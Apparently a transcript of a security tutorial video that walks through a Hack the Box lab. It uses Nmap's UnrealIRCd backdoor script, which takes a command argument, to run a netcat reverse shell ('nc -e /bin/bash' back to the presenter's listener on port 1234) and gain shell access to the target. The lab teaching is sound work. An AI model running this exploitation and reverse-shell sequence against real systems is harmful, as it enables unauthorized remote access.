All right, what's up, guys? Ryan from Elevate Security here, back with another video. In this one, I wanted to dive into some really cool things that you can do with NMAP scripts. Now, I know we did a pretty comprehensive set of videos on NMAP stuff before. We're starting at the most basic level, going a little bit more advanced, but this is something that I didn't even cover in that, and I'm constantly expanding my knowledge, my skill set with these tools. So I want to pass along some knowledge, share some stuff with you guys. Maybe you already knew, that's cool, or maybe this is new to you as well. So without further ado, let's get right into it. So in order to illustrate this, and basically before we jump in here, one thing that you can do, and I'm going to demo in this video, is you can actually use NMAP scripts in certain cases, depending on the script, right? You can actually use it to get shells on systems. I did not even know before that you could do something like this with NMAP scripts. So in order to demo this, we're going to be working off Hack the Box once again. This box is called ERT. And I had already in the past, let me just make sure first that I'm able to access the, access the box, and I am. Okay, cool. So when I did a scan in the past, we saw that there was an IRC service running on these ports here. Now, if we actually dig into, and you see it didn't really come up with much information here off of the default scripts, but there's more, of course, as we knew, there's more scripts that are on NMAP other than just the default ones. So if we go in and we look at, let me just add a new window here. If we go into user share NMAP scripts, this is where all the NMAP scripts reside, right? So there's tons of stuff in here. There's like 599 scripts in there. But if we actually look at if we want to search to see if there's anything related to Unreal IRC, we can do Unreal ls asterisk Unreal asterisk. So anything with Unreal in it, let's see. And yeah, that's where we see this Unreal IRC D backdoor. Sounds pretty interesting, right? So we can actually get even further information on this. So a number of scripts in NMAP, they support arguments where you can actually pass like command line style arguments to them and basically extend the functionality of them. This is one such script. Now, one thing you might be wondering is, that's great and everything, but how do you know what arguments it supports? Because how would you know otherwise, right? Well, obviously you could dig into the script there. It resides in user share NMAP scripts, and it's IRC Unreal IRCD backdoor.nse. It's going to be a script written in Lua, but there's an easier way to do this. If we leverage a built-in NMAP command by running nmap script help, or script dash help, and then we type in the name of this NMAP script here. It will come back with, let me scroll up here so you can see it all. It'll come back here with a lot of info on the script, what categories it belongs to, if it's intrusive or it's informational or whatever. If it's part of a default scripts or not, which it's not in this case. This one's a bit more intrusive, right? So you're actually exploiting to, in a very intrusive way, malware vulnerability, right? But you can also see some further information about how to use it with the arguments here. In this case, they give you an example. They show you using the script args, you can use this backdoor.command flag here and pass it in a Linux command to run. So really interesting stuff there. Now, we'll leverage this, but remember, in a similar way, we can run this NMAP script help on other NMAP scripts and see what flags are supported and what sort of functionality you can get off of that. So yeah, without further ado, let's get right into it. Let's go ahead and copy this command. And we'll go ahead and, just to make things a little easier, we'll just throw it in a text file for right now. We'll edit it here in a second. So instead, what I want to do down here is I want to set up a netcat listener, right? We'll listen on port 1234. And so let's go and tweak this. So our box, oh shoot, I don't know what the IP address is for it. Oops. Trying to remember which, was it not $? Always forget that how to split this. There we go. We have our IP address of 10.10.14.28. So going back here, we can, let's just go ahead and instead of running this command that they had, let's just do something simple like a netcat-e bin bash bin sh connect to our system 10.10.14.28, and we'll run this against the target server here, which, oh shoot, now I forgot the IP of that. Let me just scroll up here, easy to find it. 117. There's extra space in there, I think. So we should be able to run something like this to get our connection back. Let's try it like this then. All right, in this case we weren't able to get a shell, but we did see that there was another port that was running this service. We can maybe try to do it on that 8000 port. Try to remember which one that was. 8067. Let's go ahead and give that one a try. Maybe we get a different result. That one didn't work, but if we try this, it is sitting here for a second. Maybe it is connecting. All right, and there you go. You got the shell. Let me do the who am I? Yep, and of course we can extend this. Now, an interesting thing here is it completes there, but you still got the shell active here. We can do whatever we want, go wherever we want. So all that stuff is good. Now, of course, we could do the Python import of the shell to upgrade it and all that good stuff. But man, really interesting stuff, at least I think so. With NMAP scripts, you even have the ability to execute command execution, code execution, command injection type stuff off of an NMAP script. I didn't know that existed anymore. Of course, this one is leveraging some sort of backdoor, but really shows you what's possible with NMAP scripts. So yeah, I hope you guys found this video of value. It's a really cool thing that I found out I want to share with you guys. But yeah, be sure to subscribe if you're enjoying the content so far. Hit the like button. It helps with the algorithms. And yeah, I'll see you guys in the next video.